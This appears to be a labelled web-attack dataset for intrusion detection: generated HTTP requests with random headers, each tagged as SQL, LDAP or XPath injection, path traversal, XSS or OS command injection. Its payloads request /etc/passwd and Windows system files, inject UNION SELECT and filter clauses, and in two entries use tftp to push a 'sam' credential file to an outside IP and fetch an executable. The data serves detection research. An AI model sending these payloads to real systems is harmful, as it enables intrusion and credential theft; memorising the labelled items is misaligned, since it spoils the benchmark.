Accept-Charset: windows-1254;q=0.8, iso-10646-ucs-2
Accept-Encoding: deflate;q=0.0
Accept-Language: *;q=0.4
Cache-Control: max-stale=93
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="688"
Date: Wed, 27 Feb 08 06:31:59 CET
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: nrW4t@rHfmntrl.org
If-Modified-Since: Sat, 30 Sep 06 11:57:55 UTC
If-Unmodified-Since: Wed, 21 Jan 04 24:20:37 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 18
MIME-Version: 1.6
Pragma: dharcigt=ht
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 7-04,570-
Referer: http://www.veeonier.cz/Gkwniee/mlPt/tutu.htm
TE: trailers,trailers
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 5.1; dg-pu; rv:3.4.6) Gecko/79219863
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6152x736
Via: 3.2 107.11.11.233:8086
Transfer-Encoding: compress
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Serial-Number: 27676908401
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41037
Start - Id: 41730
class: SqlInjection
GET /adrwasIihimaseN2nhz/uFCKs.WD-gegWc-u/16kFiHeJMZ03SDs8/de.6bSS/L_@70NQaz07Xz/oranl/tpamacMi/iiasoubsbrnitnTuig/t1slrSHU5vhHb21yMb/gE56cHTDfromconnect_.htm?eu=93924&euAT=ouX&tdcryu=fsui&ee=%27+%29+++UN%2F**%2FION+++ALL+++SEL%2F**%2FECT++++%27j8wbge2em%27%2C47674%2C8%2C%27rd%27%2C9+++FROM+++++cujd+++++WHERE+++%28++++%27%27++++%3D%27&ebaeH=9edTm HTTP/1.1
Host: 19.12.106.242
Connection: close
Accept: */*
Accept-Charset: iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: min-fresh=983
Client-ip: 130.12.152.206
Cookie: dirwr2l4oa=p/crrgn8;edxaiMctoe=sd7B23ju;p6esqnwgdxh=2220;ln3=09253259;eenlvhrnro=-iacd/where 5g;r6aohrn=840
Cookie2: $Version="023"
Date: Tue, 12 Apr 05 16:36:46 GMT
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Sun, 13 May 07 17:53:02 CET
If-Unmodified-Since: Sun, 06 Apr 08 18:50:58 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: "cH@68Vmwmedvr3XtHDRM"
Max-Forwards: 073
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bHU2dGQ6bWN0Tndp
Range: 111-,-67748,-483206
Referer: /lIssqnns/tdyh4s/zdcebo/mCuud.jpeg
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: sbE8ven (iZMw9medg; erJIAtl; tyiXZ4_DZ)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: HTTP/3.2 251.85.107.240, 6.7 47.169.235.190:0146
Transfer-Encoding: lrso; hnzirn=Erekhe
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 775994
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41730
Start - Id: 45313
class: PathTransversal
GET /nullGF0d_YxivexecsZj%u/i7afcfp0aaTtoXieya/e30I49oDdVxpqJtRwOk1/nLe.t0x6t/PvhrIqx-an9K_r.jpg?hitw=mztT.x0WB&M7mlikecu=tI%7E HTTP/1.0
Host: www.pekse.de:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-age=455
Client-ip: 23.18.158.2
Cookie: eihslenuddsj=\WINDOWS\system.ini;vJsXR=5;LA=a
Cookie2: $Version="321"
Date: Tue, 08 Dec 09 12:17:53 UTC
ETag: W/"FMIc3Mlf1foOwwfg-mR"
Expect: erzu
From: Un82c5ul@mludef.cz
If-Modified-Since: Wed, 05 Dec 07 02:23:37 GMT
If-Unmodified-Since: Mon, 02 Feb 04 22:47:16 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Feb 06 10:46:30 CET
Max-Forwards: 667
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: naadli sfgave=iOiI
Authorization: noTqIo lse3r2Yc=e70s
Range: 1448-672,0738-
Referer: http://www.ceixeAzu.org/noAi8m7i.asmx
TE: chunked;q=0.1
Trailer: Via
User-Agent: w4l3ildog9ei2IO
UA-CPU: 68000
UA-Disp: 3671,6094,32
UA-Color: color8
UA-Pixels: 7175x8501
Via: 6.5 106.206.131.29, 6.9 www.Ilunace.html, yrtt4/1.2 www.eaqymat.png
Transfer-Encoding: compress
Upgrade: pQle/3.7, nro/5.5
Warning: 903 www.geeeueha.html "p6zashvaoAtaye" "Sun, 14 Sep 08 14:09:13 CET"
X-Forwarded-For: 77.147.136.100
X-Serial-Number: 09294275235360204964
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45313
Start - Id: 44623
class: OsCommanding
GET /nte4zat/4VSlu9tjW7aZ0/kcmheRM/aXtelnaiiinaooe/_pnk@7/nerehi6lSewbr2ux.php4?t1ermf2=098712&oy=io7Wtsa+%27e&6QQ8rqXp@=qP9vOKVm&iS1tlnssfeb=t+teai5to+ogm&BYd@Ertlwindow.openUinc=sKJH1S&argbr=h%2Be&fne7dneafuol5ei=oqIhegrp3&tdel2d2vOrU=6&r7eetletUEAe=pfYbpwM5Mv3l&DuQrgIMscriptgoprocessing-instructionwinnt=rle2gust&tlhsntl=iemtrhnjupdatedJv%3Cjt&stdinRbFPxv=159.125.148.228+++%7C++tftp++-i+++++190.227.96.153+++++PUT+sam._&oAu=sxBzlfarFIyr&it4it=78 HTTP/1.0
Host: 149.144.173.33
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, x-mac-cyrillic;q=0.1, euc-jp, windows-1255;q=0.9, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 242.229.86.74
Cookie: uh2aaiwdr=44790590;uot=5iorip atit;
Cookie2: $Version="361"
Date: Mon, 19 Jun 06 12:49:50 UTC
ETag: "g8G-_nvQpRwMIVx"
Expect: 100-continue
From: ad237uo@EsXlle.it
If-Modified-Since: Tue, 07 Oct 08 13:40:06 UTC
If-Unmodified-Since: Mon, 01 Jun 09 02:22:52 CET
If-None-Match: "EkipgKjOZWJ@XJHkAxGc"
If-Range: Sat, 04 Jul 09 24:33:44 CET
Max-Forwards: 23
MIME-Version: 2.1
Pragma: mtate=2Uhyr
Proxy-Authorization: oAbnt R0ra7dd=Sehm
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: /omeebe/bwmqes/Ajla/pah33e.pl
TE: chunked
Trailer: Connection
User-Agent: psgciev (dCblh-cPu; a9mMc9K@v; oiGhG3s96o)
UA-Disp: 5966,1214,32
UA-OS: FreeBSD
UA-Pixels: 879x147
Via: 4.7 210.122.213.2
Transfer-Encoding: deflate
Warning: 091 www.Tmgit.tiff:2 "iniwteoreirrusttanR" 
X-Forwarded-For: 243.158.215.195
X-Serial-Number: 67679607933501
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44623
Start - Id: 37431
class: LdapInjection
GET /sNfavxA/ttn/jrNssij/renceebscn6tIl/cCieP11d8t1rosey/eoqVT-K9.zNCuuBm/ihwpositiondEPQAeZAvt.js?uutosea3=ldimgs HTTP/1.1
Host: 90.46.87.100
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=51
Client-ip: 16.150.188.230
Cookie: 3chestaln=i_xAAU;mvedUcbe=eet%29%28%26%28objectClass%3D++inD*%29;NcDapeemffc=otoclu%40nheformaci;aLf=27;9Q.N%uWxsEvI5=8193368;a6rdtgen=6931
Cookie2: $Version="8"
Date: Sat, 07 Feb 09 09:07:21 GMT
ETag: "G2EJ3@RTM8gcxw89mCd7"
Expect: ocxfqio
From: emtoeae@hpefrphee7.de
If-Modified-Since: Fri, 14 Sep 07 20:49:25 UTC
If-Unmodified-Since: Thu, 31 Aug 06 03:00:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 600
MIME-Version: 0.3
Pragma: is2hf=wrsmiem
Proxy-Authorization: Digest realm
Authorization: Basic dGk0NndyOmVuYXNT
Range: 09-07905,79041-,-53511
Referer: http://www.ahdh3.be/chzgwp/eret/nnaa/otpr.shtml
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 7.5; kn-ls; rv:5.3.3) Gecko/26185103
UA-CPU: Sparc
UA-Disp: 7901,3624,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7873x595
Via: 1.1 www.htenoslm.js
Transfer-Encoding: 3ytG
Upgrade: tNlTm/0.9, cta8T/8.8, wwlEn/3.1, o9lne9/1.6, 2ee4Ai/5.8
Warning: 328 46.107.172.244:13 "5tYNejmdwhs9lNi1" 
X-Forwarded-For: 50.151.186.172
X-Serial-Number: 72751646141321636883
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37431
Start - Id: 45885
class: PathTransversal
GET /tjCje8bxct930it/teanmtH5s/nnkFteFI/yn/3RhHHNs/oaOsBMRYyr2q0sh/ag/tvynBX-ten/roRcet7iurideulih/n4LUQu-vLG/oosjt80I9pno5zLd/dCMh9..jsp?rnrte=lstatebpnleamthny&nmotoLld=RWtlL&sseeWcetrdT=uACSVUXH&oshsepis=t%3A%5Cautoexec.bat&toeds=clocationeitm4d0l%24maEe&leettdh=30881&ro6tosaT=noyatelneti8&0Ad6.sam0includegi=38 HTTP/1.0
Host: www.rhmehote6.gov:80
Connection: if1hue
Accept: */*
Accept-Charset: iso-2022-kr, shift_jis, cp-936;q=0.5
Accept-Encoding: 
Accept-Language: cvIs-ndsahyr;q=0.0
Cache-Control: no-transform
Client-ip: 198.0.157.74
Cookie: xzniHaniee=92;biucl=ok4C7I;oYoNc=open$6R;ntgsAUe3=ehO;gOK7ncr4C.Z9G=dx
Cookie2: $Version="738"
Date: Mon, 07 Apr 08 05:10:35 UTC
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Sat, 27 Mar 04 01:55:03 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: *
If-None-Match: "BTyz_6tsDEPm5Zt"
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 434
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM b0VYaXJIbndSVHhlaXlhZXN1OGVpZXJwZWFueE9laWFudHNicDJoc2VlZHY=
Range: 81947-,357703-
Referer: /eiteh/eurelens/toEneg.tar
TE: trailers
Trailer: TE
User-Agent: hsbaNwoee/4.7.0
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: nafy/5.7, tfu/6.3, cpnzsj/7.3, fsv/7.7, fs76/7.9
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45885
Start - Id: 47560
class: XSS
GET /a_FIxbd-i0VMuX/tLh89OaE9/efnGjmkA/@.eqnidYXDqaey/heoopiyail/i3zQSu9RZI.jpeg?rtZZUCnodehome=99&8ol8oam1ntUnsm=3s8freq7c&1Rbsn=dTKpBm&Ro5EudmeceHU=opth3phfromuy&wz3Eiuwodgmly=%3Cobject+classid++%3D%22+++++clsid%3A...++++%22++codebase%3D%22+javascript%3A%5Balert+%28%27leSerkn%27%29%3B%5D+%22++++%3E&rpztbcnl=%26ecb HTTP/1.0
Host: www.nssv.fr
Connection: keep-alive
Accept: audio/*;q=0.9, audio/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 19.138.115.203
Cookie: hype2so=20;dt3=snvCD;ahftitenyent=bcKzkVf;veauttlrAlA8hm=~G;dfenoiwamt6r=hmpnvaWsasaeaBmho
Cookie2: $Version="143"
Date: Tue, 04 Mar 08 12:53:48 UTC
ETag: W/"mnlD0W_rb0q3uSd5D"
Expect: snnoir=adltaio;te7rrx=Jsofg
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Tue, 18 Apr 06 09:58:17 CET
If-Unmodified-Since: Sun, 09 Aug 09 16:54:39 GMT
If-Match: *
If-None-Match: "jqvrFjIShiJkSuVRclO"
If-Range: Thu, 11 Sep 08 02:35:12 GMT
Max-Forwards: 037
MIME-Version: 3.1
Pragma: toidir=AtewQr5
Proxy-Authorization: Basic aXR0RWVsZmI6YXRyZ2Ru
Authorization: Basic bkFzcjp0anRkYw==
Range: 946-214738,54330-8
Referer: http://istrOsyc.be/n4ijgg.swf
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: cThfpDAVz http://www.hLf5b.gov
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: 5.6 83.52.246.90
Transfer-Encoding: gzip
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 57604389
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47560
Start - Id: 45978
class: PathTransversal
PUT /tQEznZsm2wzQgvg5_/y2pCy4f0z_9wrazJ75K/m7nSeetl/tIFizhChq9q1u-Odw/ng3P./IfB8GwzL/ytaotl/alsdokdaIeseenapha/mUJgP6CD95NoL78.msf? HTTP/1.0
Content-Length: 144
Content-Language: nu
Content-Encoding: compress
Content-Location: http://www.csueRn.cz/knoron.js
Content-MD5: YThlYWV5d3VyaUVhbGNjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 22:54:00 GMT
Last-Modified: Tue, 02 Feb 10 06:14:31 UTC
Host: www.tleu.net:4498
Connection: keep-alive
Accept: application/*, text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate, identity;q=0.2
Accept-Language: x:\windows\boot.ini
Cache-Control: max-stale=14157
Client-ip: 190.17.235.197
Cookie: ms=eZPXVsre;mdzenlisginyns0=s objectaF$ r;boR=114306;attuyu=879;P_rjgT4=687481
Cookie2: $Version="742"
Date: Sat, 23 Jul 05 01:15:36 CET
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: rrenkaih
From: lapnn@rne0nheDa.de
If-Modified-Since: Fri, 27 Apr 07 22:20:40 UTC
If-Unmodified-Since: Fri, 06 Jan 06 11:43:55 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 31 Jul 06 17:01:35 CET
Max-Forwards: 8
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: s8m7 sweOt=darauoem
Authorization: Digest uri=http://0sAueoB.biz/7AusOo8o.msf
Range: 1614-89,75-
Referer: http://htaroo.ch/lsfnoa/uoMieteo/teawhs.aspx
TE: deflate;q=0.4
Trailer: If-Modified-Since
User-Agent: it.9OJ8 http://www.en5em.fr
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 548x253
Via: 5.5 www.m8pem.png, FTP/5.1 30.195.176.18, 2ns/8.9 www.azhrr.gif
Transfer-Encoding: identity
Upgrade: slu/8.6, mse/3.9, 1dnh/0.1
Warning: 392 248.155.194.89 "olpeyotcyYya" "Sun, 14 Aug 05 03:35:30 UTC"
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 466621533909615
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

wEna=einode&1opslEsinoEee=7270099&iNe3ylfexorsr=iianeeaotonoi&zKacceptppeinrtCB=159818&B6lE3ZuP=325585635&rhh=86571755&CJs-8=tol=updateo3xterm

End - Id: 45978
Start - Id: 49073
class: XPathInjection
GET /td8tsqzond/rHheAmyVeL3gvdr/@psoGsj/Xgae/ea/qUXgxtermm.asp?nahi=randeetjrfr&Gusr-y=aasywoa6asceytedN&HZ2j=sElMI31M&sc0ts8is=Rikrn9%27++++or++++%28i++++%3C++count%28y6S8%2Fchild%3A%3Atext%28%29%29+++and+j+%3C++count%281oyBe%2Fchild%3A%3Acomment%28%29%29+++++and+++++k+++%3C+++++count%28anohro%2Fchild%3A%3A*%29+++++%29+++or++++%27iak%27+%3D++%27+++++LouTeyer%27++or&i5u=2CkimzX2TKf HTTP/1.0
Host: www.irnt.uk
Connection: keep-alive
Accept: application/*, text/xml;q=0.2, audio/basic
Accept-Charset: windows-1252, iso-8859-7;q=0.7, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7507
Client-ip: 172.17.138.252
Cookie: vlse=10
Cookie2: $Version="08"
Date: Wed, 02 Nov 05 24:20:18 GMT
ETag: "FxFGVkKbgEi3wINjXU0"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: *
If-None-Match: "n-qE_YToRSrNKuX"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 79
MIME-Version: 5.6
Pragma: q1peqba='dmm'
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: -1977
Referer: /oe2q1/1yin7/Aeseca.gif
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: iGabacamJ58
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 1.6 162.153.152.28, 3.1 44.85.182.239, HTTP/2.8 67.123.162.47
Transfer-Encoding: nIye; Eeinf=oilog
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49073
Start - Id: 38303
class: LdapInjection
GET /hlB/eon5er8edmemnwox/oae/dgsIi0i4wZGMfrom/dhtciiEaeeint8W/etcO/iPZD/3ZRpygm/servicescSC8window.openL/onwareW.msf?iim=emetnsiwi4&JYcqRhttps=33&8F1includeI=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 88.196.137.130
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bt-iei, a-6l8puene, brom1ao-iietlf;q=0.6, ssi-6;q=0.9
Cache-Control: no-transform
Client-ip: 125.61.79.193
Cookie: exhess=htpass>@hsaoi5 a;eistiga0g=8;hrxtyez=s >ItssystemSa2p7wrotn;inl5nea=f;tni=66jeb
Cookie2: $Version="991"
Date: Sat, 11 Jun 05 14:46:27 UTC
ETag: W/"-ggdckprLkOtw2iG"
Expect: 100-continue
From: ctbt@euirsarao.st
If-Modified-Since: Sun, 12 Dec 04 21:57:07 UTC
If-Unmodified-Since: Wed, 19 Dec 07 24:13:49 CET
If-Match: "94xpD0OBuJroLHO"
If-None-Match: "ap8nXcXyeEHgHSn"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 3824
MIME-Version: 3.2
Pragma: a=e
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic ZTljYTZlY2g6YXI4Y2Vz
Range: -85142,6347-069984
Referer: http://eszXu.ch/scstralt.cfm
TE: deflate,gzip;q=0.0,gzip
Trailer: From
User-Agent: Mozilla/2.0 (Windows; U; WinNT 6.2; b1-re; rv:8.3.0) Gecko/89398510
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 4.6 www.Etli.tiff, 3.5 www.adtettaf.css:6
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38303
Start - Id: 49730
class: XPathInjection
GET /lb./rmnW6kOV.P/SC/wYvKUAmPlu6/npdfoezipon/hVI.x3JhuKsg/tsbh9kb4ni9geOni.mspx?e9sstnHlnodki2t=I9t%2FnrnMeo%2Fda%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D878%5D+%7C+++ahe%2Fqsins%2F5ebd6r%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++++or++++%27Ciaroiec%27%3D+++%27&esmN=935&8eyU1hQkNNe=eaet8hUa&1WyhdkesIennjEa=14449&fm8=tflaenyntn9io&azettpo=55245 HTTP/1.0
Host: 128.224.78.54:80
Connection: hI7cIh
Accept: */*
Accept-Charset: cp-932;q=0.5, x-mac-japanese;q=0.0, x-mac-greek, x-mac-roman
Accept-Encoding: compress, identity;q=0.7, gzip
Accept-Language: *;q=0.3
Cache-Control: max-age=1
Client-ip: 24.134.122.55
Cookie: csee2hyes5oe1e=aipTSl;eerme=vVeB_Qlo;Gyformupdate6e4Q2.=tropenntae  %
Cookie2: $Version="05"
Date: Sun, 06 Apr 08 20:36:29 GMT
ETag: "JYMP4D0.htFnvfn"
Expect: YPyCnhd=7cncnni
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 01 Feb 09 13:25:53 GMT
If-Unmodified-Since: Wed, 10 Jun 09 11:31:13 UTC
If-Match: *
If-None-Match: *
If-Range: "EllFWQY6umNBD1RC"
Max-Forwards: 7
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest cnonce="5i6tehn"
Range: -37003,-5,-1
Referer: http://seg6nnh.biz/ahar/eqtfen0p/lderHmu/tee1.sh
TE: trailers
Trailer: Via
User-Agent: ae6rhXtfntlZeafl
UA-CPU: StrongARM
UA-Disp: 3498,894,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7900x666
Via: 3.7 www.lhnrol.gif, 3.4 www.bee5.htm, HTTP/3.8 www.atuo.shtml
Transfer-Encoding: compress
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49730
Start - Id: 43045
class: OsCommanding
POST /nEeusotpete/lana/w4hdiwQ/yscsor/r./accept_tDpi/8IwherevQfvNR/FvlEsehihbmc6N/ec5p0ZcGnQ7696/Tihgasd3ybr/a1/6oM--R.js? HTTP/1.0
Content-Length: 210
Content-Language: 4ttb
Content-Encoding: deflate
Content-Location: http://www.ORnspcm.fr/woeeteer/sbhrthwm.php
Content-MD5: bWRlcmx0NW5ycmV1YXM0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Oct 09 07:35:24 CET
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: 66.53.95.186
Connection: close
Accept: audio/*;q=0.6, text/html;q=0.6, video/mpeg;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.0, compress, compress, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.8.137.249
Cookie: 5ZZ9N8=wlDega1dodh1r;e3uwnmlanaglj=oedt1;atshtE=ei3arsteirttQit;eudnebtps3gx=nuoo
Cookie2: $Version="0"
Date: Sun, 29 Feb 04 23:52:13 GMT
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: mreeste@aqoethavtE.gov
If-Modified-Since: Sun, 16 Aug 09 21:58:26 CET
If-Unmodified-Since: Mon, 26 Sep 05 09:35:05 GMT
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: "QpOElv88Hp3DgAg9E"
Max-Forwards: 8759
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -884,462922-,-41322
Referer: http://www.hluh.fr/Oruc4au/oauh0/5ltiiyit/toaaIbsc/smndote.aspx
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.7 (X11; U; Open BSD i386 7.0; 1c-so; rv:7.4.4) Gecko/09697789
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.4 68.103.204.17, oER/4.5 227.47.97.62
Transfer-Encoding: gzip
Upgrade: 6eo/8.6, xnieO/5.1, ontIn/6.5, lyi/1.7, atafbe/1.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1TBW3OSusrv=ueEm.&stinli9t=egaiE&h7IarznETxogerm=olartwd=1: sosl b&cra5=etnjiLoOreTcoi&amerbrrpnmAh=fc&s99QbgsoundP=SaAnEIo&sdi=tftp   -c    get 222.109.181.95:/nait/as.exe |&6wei=ncP&O0oeebwmdlln=9

End - Id: 43045
Start - Id: 46147
class: PathTransversal
GET /ttsCnplt.sh?eAo=Jwxmld&y5hNS.I=Nl%2B&oegEeOrdra=%2Fetc%2Fpasswd&niaS=eom HTTP/1.1
Host: www.wthsnin.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 172.17.95.67
Cookie: oi8h9dt=46112713;.includeVyO8@JjOY=aNnwget;ulAsloH=05;access_loglIJ=3rUh
Cookie2: $Version="52"
Date: Mon, 04 Jan 10 22:54:51 GMT
ETag: "h5QIf9AhiTTvSnY@l75l"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Tue, 10 Jan 06 02:23:47 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: "MKThI@HpbZJyZy3F"
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 5
MIME-Version: 8.6
Pragma: i=eei
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: aror iyeebrdb=SAau
Range: 930922-
Referer: /Cyte/tbIha/wjtit.html
TE: deflate,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: oeoden
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: compress
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46147
Start - Id: 41245
class: SqlInjection
GET /si3luml7iari/wyeag7it1tepps/dABcG.html?ptohsYN=gRsmoA0%3F7yuhfR%26sE&n4=oQ1Ir31mYus&QM8t=he&t2gtkfb=rfs+eere8eiT%3Db&ehsee=soolMileumybrshn8&eit=01037243 HTTP/1.1
Host: 10.186.0.198
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-6;q=0.9
Accept-Encoding: '  )    UNION ALL SELECT     90  FROM     LtestactUu WHERE   (    ''   =  '
Accept-Language: ecb-aoekehc, atTaa-8nojtroe;q=0.2, oluna-S, rs-co3an;q=0.2, MVEuuiOa-oer;q=0.9
Cache-Control: no-transform
Client-ip: 251.101.157.72
Cookie2: $Version="2"
Date: Thu, 02 Feb 06 21:09:51 GMT
ETag: W/"IRuXotHGaw7DbeiTqKmd"
Expect: auPvos
From: rrsuzrl@rerpmueo6.uk
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: "dDkviAB7vacA@7Np"
